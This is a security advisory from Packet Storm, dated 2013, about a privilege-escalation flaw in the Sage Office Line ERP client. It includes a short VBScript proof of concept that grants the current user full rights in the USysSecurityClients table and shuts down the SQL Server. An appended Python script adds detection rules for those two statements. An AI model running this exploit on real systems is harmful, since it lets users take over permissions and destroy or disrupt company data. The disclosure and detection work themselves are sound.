German ERP Sage Office Line Privilege Escalation

18 Sep 2013 | Reported by x180913erp | Type: packetstorm | Source: packetstormsecurity.com

Security Vulnerability in German ERP "Sage Office Line" allows privilege escalation and data loss via the "mandator-object" in the software's Microsoft Access Frontend Client

Code
`  
  
Security Vulnerability in German ERP system "Sage Office Line"  
  
Recently, I discovered a Security Vulnerability in the  
German ERP system "Sage Office Line", created by the German branch of the  
UK-based Sage Group. The Software is sold in Germany, Austria and  
Switzerland. According to their website, Sage Germany has more than  
250.000 customers.  
-------------------------  
Affected products:  
-------------------------  
  
- Sage Office Line Evolution 2012 (with newest patches installed)  
- Sage Office Line Evolution 2013 (with newest patches installed)  
- most likely previous versions (untested)  
-------------------------  
Effects:  
-------------------------  
  
- Code execution  
- Privilege escalation  
- Data loss  
-------------------------  
Details:  
-------------------------  
  
The software is based on a Microsoft Access Frontend Client  
(available as ADE and ADP) and some server-based tools. Microsoft SQL  
Server is used to store all data. A typical client installation on the  
computer of each office worker contains the MS Access frontend and  
also many .Net assemblies called via COM-interop by the Access client.  
  
Main entry point for the Vulnerability is the so-called  
"mandator-object" which is initiated when a user logs in to the  
software. This object holds all information regarding the accessed  
database and also about the privileges of the user.  
  
If a user has valid credentials to start the software, even if he has  
minimal permissions, he can use local VBScript and COM automation to  
gain full access to the mandator object. This object holds, among  
other interesting things, an ADO.NET connection object, which was  
instantiated with an SQL user with full rights on the affected  
database. Using the ADO.NET connection object, the user can give  
himself full permissions or even delete all data in the database.  
  
According to Sage Software, there is a feature called "Erweiterte  
Codesicherheit" ("Extended Code Security") which should secure the  
system by blocking non-signed code from accessing the System. The  
Feature has no effect on the vulnerability described in this post.  
-------------------------  
Proof of Concept:  
-------------------------  
  
The following code has to be saved locally in a VBS file. It may be  
necessary to adjust the path to the MS Access ADE file. It grants full  
access to the current user and then tries to shut down the SQL Server  
service.  
  
Set objAccess = GetObject("C:Program Files (x86)SageOffice Line6.1Abfolabf_001.ade")  
Set goMandant = objAccess.Run("goMandant")  
goMandant.oData.Execute "UPDATE USysSecurityClients SET Rights = 3 WHERE UserName='" & goMandant.oBenutzer.sName & "'"  
goMandant.oGlobalData.Execute "SHUTDOWN WITH NOWAIT"  
`
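
Added example, not part of the original advisory or of Sage's software: detection logic for the two statements the proof of concept sends, a write to `USysSecurityClients` and a `SHUTDOWN`, run over statement-level audit records. The record layout, host names, sample statements and the `admin_hosts` parameter are assumptions made for this example. Because the client's connection runs as a full-rights SQL user rather than as the person at the keyboard, the example keys on the client host.

```python
import re

# Constructed statement-level audit records; the field names and host names
# are assumptions for this example, not a real SQL Server export format.
SAMPLE_EVENTS = [
    {"host": "WS-014", "sql": "SELECT Name FROM ExampleArticles WHERE Id = 4711"},
    {"host": "WS-022", "sql": "update [dbo].[USysSecurityClients]\n set Rights = 3 where UserName='jdoe'"},
    {"host": "WS-022", "sql": "SHUTDOWN /* now */ WITH NOWAIT"},
    {"host": "WS-007", "sql": "SELECT Rights FROM USysSecurityClients WHERE UserName='asmith'"},
    {"host": "WS-007", "sql": "INSERT INTO ExampleNotes(Body) VALUES ('shutdown the old server')"},
]

# String literals, block comments and line comments, matched left to right so
# that comment markers inside a literal (and quotes inside a comment) are inert.
_TOKEN = re.compile(r"'(?:[^']|'')*'|/\*.*?\*/|--[^\n]*", re.S)

RULES = {
    # Any write to the rights table named in the advisory's proof of concept.
    "security-table-write": re.compile(
        r"\b(?:update|insert(?: into)?|delete(?: from)?|merge(?: into)?)"
        r"\s+(?:\w+\.)*usyssecurityclients\b"),
    # SHUTDOWN as a statement of its own, not as a word inside other text.
    "server-shutdown": re.compile(r"(?:^|;)\s*shutdown\b"),
}

def normalize(sql):
    """Blank string literals, drop comments and identifier quoting, fold case."""
    sql = _TOKEN.sub(lambda m: "''" if m.group().startswith("'") else " ", sql)
    sql = re.sub(r'[\[\]"]', "", sql)
    return re.sub(r"\s+", " ", sql).strip().lower()

def detect(events, admin_hosts=frozenset()):
    """Return (host, rule) for every rule hit from a host not in admin_hosts."""
    hits = []
    for ev in events:
        if ev["host"] in admin_hosts:
            continue
        text = normalize(ev["sql"])
        hits += [(ev["host"], name) for name, rx in RULES.items() if rx.search(text)]
    return hits

if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"ALERT {rule} from {host}")
```

Legitimate rights administration also writes to this table, so `admin_hosts` should list the workstations from which such changes are expected.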
